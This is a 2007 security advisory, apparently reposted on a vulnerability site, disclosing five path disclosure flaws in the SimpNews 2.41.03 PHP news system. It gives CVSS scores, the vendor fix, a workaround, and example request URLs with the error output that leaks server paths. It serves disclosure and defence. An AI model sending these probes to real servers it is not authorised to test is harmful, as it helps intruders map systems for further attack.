SimpNews version 2.41.03 Multiple Path Disclosure Vulnerabilities

2007.09.27
Risk: Low
Local: No
Remote: Yes
CWE: N/A

netVigilance Security Advisory #68 SimpNews version 2.41.03 Multiple Path Disclosure Vulnerabilities Description: SimpNews is a news system written in PHP. Features: Data stored in MySQL, admin interface, support for multiple languages, support for multiple instances in one database, own header, multiple layout settings, support for BBCode andsmilies, you can assin an icon graphic to every news entry, you can attach a file to news entries, entries can be put in categories, users can subscribe to get news sent by email, search entries, users can post comments on news entries, event calendar, newsticker, option to let users propose news entries. External References: Mitre CVE: CVE-2007-4872 NVD NIST: CVE-2007-4872 OSVDB: ID requested but no answer received Summary: SimpNews is a news system written in PHP. Security problems in the product allow attackers to gather the true path of the server-side script. Advisory URL: http://www.netvigilance.com/advisory0068 Release Date: 09/25/2007 CVSS Version 2 Metrics: Base Metrics: Exploitability Metrics: Access Vector: Network Access Complexity: Low Authentication: None Impact Metrics: Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None Temporal Metrics: Exploitability: Functional Remediation Level: Official Fix Report Confidence: Confirmed CVSS Version 2 Vectors: Base Vector: "AV:N/AC:L/Au:N/C:P/I:N/A:N" Temporal Vector: "E:F/RL:OF/RC:C" CVSS Version 2 Scores: Base Score: 5 Impact Subscore: 2.9 Exploitability Subscore: 10 Temporal Score: 4.1 SecureScout Testcase ID: TC 17987 Vulnerable Systems: SimpNews version 2.41.03 Vulnerability Type: Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors. Vendor: Bosch IT-Consulting Vendor Status: The Vendor has confirmed the problem and has release new version 2.42.01 that addresses the problem. New version of product was tested and we can confirm that all vulnerabilities were solved. For more information see vendor announcement. To download the latest version go to vendors product download area. Workaround: Disable warning messages: modify in the php.ini file following line: display_errors = Off. Or modify .htaccess file (this will work only for the apache servers). Example: Path Disclosure Vulnerability 1: REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/admin/index.php?lang=123 REPLY: ...<b>Warning</b>: main(./language/lang_123.php): failed to open stream: No such file or directory in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\index.php</b> on line <b>11</b><br /> <b>Warning</b>: main(): Failed opening './language/lang_123.php' for inclusion (include_path='.;c:\php4\pear') in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\index.php</b> on line <b>11</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]\admin\index.php:11) in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\heading.php</b> on line <b>87</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]\admin\index.php:11) in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\heading.php</b> on line <b>88</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]\admin\index.php:11) in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\heading.php</b> on line <b>89</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]\admin\index.php:11) in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\heading.php</b> on line <b>90</b><br />... Path Disclosure Vulnerability 2: REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/admin/dbg_infos.php REPLY: <b>Parse error</b>: parse error, unexpected T_IF, expecting ',' or ';' in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\dbg_infos.php</b> on line <b>34</b><br /> Path Disclosure Vulnerability 3: REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/admin/heading.php REPLY: <b>Warning</b>: mysql_query(): supplied argument is not a valid MySQL-Link resource in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\admin\heading.php</b> on line <b>17</b><br /> Path Disclosure Vulnerability 4: This vulnerability can be exploited only with PHP version < 5.0.0 and MS Windows hosting. REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/events.php?link_date=22007-02-17 REPLY: <b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\events.php</b> on line <b>143</b><br /> <b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>z[DISCLOSED PATH][PRODUCT DIRECTORY]\events.php</b> on line <b>143</b><br /> Path Disclosure Vulnerability 5: REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/evsearch.php REPLY: <b>Parse error</b>: parse error, unexpected '{' in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\evsearch.php</b> on line <b>599</b><br /> Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com ?? ?? ?? ??


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top